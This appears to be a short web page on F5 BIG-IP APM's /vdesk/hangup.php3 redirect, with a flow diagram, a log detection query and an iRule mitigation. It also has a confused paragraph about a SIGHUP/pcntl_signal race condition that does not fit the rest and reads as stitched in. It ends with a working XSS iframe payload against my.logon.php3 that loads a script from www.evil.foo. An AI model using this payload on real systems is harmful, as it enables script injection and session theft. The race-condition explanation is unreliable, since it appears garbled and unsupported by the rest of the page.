Hangupphp3 Exploit | Vdesk

Client Browser                           F5 BIG-IP APM Virtual Server
      |                                             |
      |--- 1. Request with Invalid Host ----------->|
      |                                             | (Evaluates policy / host header)
      |<-- 2. HTTP 302 Redirect (Hangup) -----------|
      |                                             | (Triggers cleanup sequence)
      |--- 3. GET /vdesk/hangup.php3 -------------->|
      |                                             | (Deletes session cookies)
      |<-- 4. Final Disconnect / Deny --------------|

Detection query (web access logs): uri_path:"/vdesk/hangup.php3" AND status:302 AND referer:*

The hangup.php3 script receives the SIGHUP signal. Because the script registers a handler with pcntl_signal() but never calls pcntl_signal_dispatch() in a safe context, the handler runs asynchronously and forks. The parent process writes to the session file while the child process, intended to clean up call resources, attempts to write a log entry at the same time. This creates a race condition.

Mitigation: Ensure that your APM access policies handle authentication failures correctly. For API clients that expect 401 responses, implement iRules to prevent unwanted redirects to /vdesk/hangup.php3.
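One way to implement the iRule suggested above, as an added example that is not part of the original page or an F5-provided configuration: on policy denial the iRule answers with a 401 directly instead of letting APM redirect the client into the /vdesk/hangup.php3 cleanup sequence. It assumes the default APM deny ending is what produces that redirect, and it returns 401 to every denied client rather than trying to distinguish API clients from browsers.

```tcl
# Added example iRule (not from the page). Attach to the APM virtual server.
# On a "deny" policy result, respond 401 with a JSON body instead of the
# default redirect to /vdesk/hangup.php3, so API clients get the status
# they expect and do not follow a cookie-clearing redirect chain.
when ACCESS_POLICY_COMPLETED {
    # ACCESS::policy result is "allow", "deny" or "redirect"
    if { [ACCESS::policy result] eq "deny" } {
        # Assumption: all denied clients should receive 401; narrow this
        # condition (e.g. on a session variable) if browsers need the
        # normal APM deny page instead.
        ACCESS::respond 401 content "{\"error\":\"unauthorized\"}" \
            "Content-Type" "application/json" \
            "WWW-Authenticate" "Bearer realm=\"apm\"" \
            "Connection" "close"
    }
}
```

Confirm the change with the detection query above: after deployment, denied API requests should stop producing 302 responses for /vdesk/hangup.php3 in the access logs.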

<html> <iframe src="https://target.tld/my.logon.php3?%22%3E%3C/script%3E%3Cscript%3Eeval%28name%29%3C/script%3E%3C%21--" width="0%" height="0%" name="xss=document.body.appendChild(document.createElement('script'));xss.setAttribute('src','http://www.evil.foo/b')"></iframe> </html>
